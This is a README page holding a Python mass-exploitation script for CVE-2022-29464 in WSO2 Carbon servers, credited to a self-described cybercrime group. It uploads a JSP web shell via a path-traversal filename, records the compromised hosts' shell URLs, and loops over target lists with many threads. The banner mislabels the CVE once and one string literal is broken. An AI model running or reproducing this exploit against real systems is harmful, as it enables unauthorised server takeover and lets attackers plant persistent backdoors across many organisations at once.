README.md
Rendering markdown...
import requests
import os
import urllib3
import concurrent.futures
from sys import stdout
from colorama import Fore, init
from concurrent.futures import ThreadPoolExecutor
init(autoreset=True)
delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if not os.path.exists('Results'):
os.mkdir('Results')
os.system('clear' if os.name == 'posix' else 'cls')
def banners():
os.system('clear' if os.name == 'posix' else 'cls')
stdout.write(" \n")
stdout.write(""+Fore.LIGHTRED_EX +"$$$$$$\ $$$$$$\ $$$$$$\ $$\ $$\ $$\ $$\ \n")
stdout.write(""+Fore.LIGHTRED_EX +"$$ __$$\ $$ __$$\ $$ __$$\ $$$\ $$$ |\$$\ $$ | \n")
stdout.write(""+Fore.LIGHTRED_EX +"$$ / \__|$$ / \__|$$ / \__| $$$$\ $$$$ | \$$\ $$ / \n)
stdout.write(""+Fore.LIGHTRED_EX +"\$$$$$$\ $$ | $$ | $$\$$\$$ $$ | \$$$$ / \n")
stdout.write(""+Fore.LIGHTRED_EX +" \____$$\ $$ | $$ | $$ \$$$ $$ | \$$ / \n")
stdout.write(""+Fore.LIGHTRED_EX +"$$\ $$ |$$ | $$\ $$ | $$\ $$ |\$ /$$ | $$ | \n")
stdout.write(""+Fore.LIGHTRED_EX +"\$$$$$$ |\$$$$$$ |\$$$$$$ |$$\ $$ | \_/ $$ | $$ | \n")
stdout.write(""+Fore.LIGHTRED_EX +"\______/ \______/ \______/ \__|\__| \__| \__| \n")
stdout.write(""+Fore.YELLOW +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n") stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"CVE-2022-29469 Exploiter By "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" SamuraiMelayu1337 | SynixCyberCrimeMY "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" GITHUB.COM/S4MURAIMELAYU1337 "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╔════════════════════════════════════════════════════════════════════════════╝\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"USING "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" pip3 install -r requirements.txt "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"Thanks To "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" All Member SynixCyberCrimeMY + Muslim Hackers "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╚════════════════════════════════════════════════════════════════════════════╝\n") print(f"{Fore.YELLOW}[CVE-2022-29464] - {Fore.GREEN}PERFORM WITH MASS EXPLOITS WSO2 CARBON SERVER\n")
banners()
def exploit(url):
try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', 'Content-Type': 'application/json'} # .MF, .jspx, .jspf, .jsw, .jsv, xml, .war, .jsp, .aspx
files = {"../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp": open("Files/shell.jsp", "rb")}
resp = requests.post(f"{url}/fileupload/toolsAny", timeout=10, verify=False, files=files)
if resp.status_code == 200 and len(resp.content) > 0 and 'java' not in resp.text:
print(f"{Fore.YELLOW}[CVE-2022-29464]{Fore.RED} .: {Fore.GREEN}[W00T!] {Fore.YELLOW}- {Fore.GREEN}{url}/authenticationendpoint/shell.jsp")
with open('Results/Results.txt', 'a') as f:
f.write(f"{url}/authenticationendpoint/shell.jsp\n")
else:
print(f"{Fore.YELLOW}[CVE-2022-29464]{Fore.YELLOW} .: {Fore.RED}[Failed!] {Fore.YELLOW}- {Fore.RED}{url}")
except KeyboardInterrupt:
print(f"{Fore.CYAN}KeyboardInterrupt{Fore.RESET}")
def single_scan():
url = input(f"{Fore.YELLOW}[DOMAIN/IP] {Fore.RED}.: {Fore.WHITE}")
if not url.startswith("http"):
url = "https://" + url
exploit(url)
def mass_scan():
urls_file = input(f"{Fore.YELLOW}[DOMAIN/IP LIST] {Fore.RED}.: {Fore.WHITE}")
if not os.path.isfile(urls_file):
print(f"{Fore.RED}WHUT ARE YOU DOIN? FILE NOT FOUND!\n")
return
with open(urls_file, "r") as f:
urls = f.read().splitlines()
urls = [url if url.startswith("http") else "https://" + url for url in urls]
try:
max_threads = int(input(f"{Fore.YELLOW}[THREAD: 10-30] {Fore.RED}.: {Fore.WHITE}") or "10")
with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor:
results = [executor.submit(exploit, url) for url in urls]
except KeyboardInterrupt:
print(f"\n{Fore.RED}[KeyboardInterrupt]{Fore.RESET}")
def main():
print(f"{Fore.RED}[1] - {Fore.YELLOW}SINGLE SCAN")
print(f"{Fore.RED}[2] - {Fore.YELLOW}MASSIVE SCAN\n")
choice = input(f"{Fore.YELLOW}[CVE-2022-29464] {Fore.RED}.: ")
if choice == "1":
single_scan()
elif choice == "2":
mass_scan()
else:
print(f"{Fore.RED}WHUT ARE YOU DOIN? FILE NOT FOUND!")
if __name__ == '__main__':
main()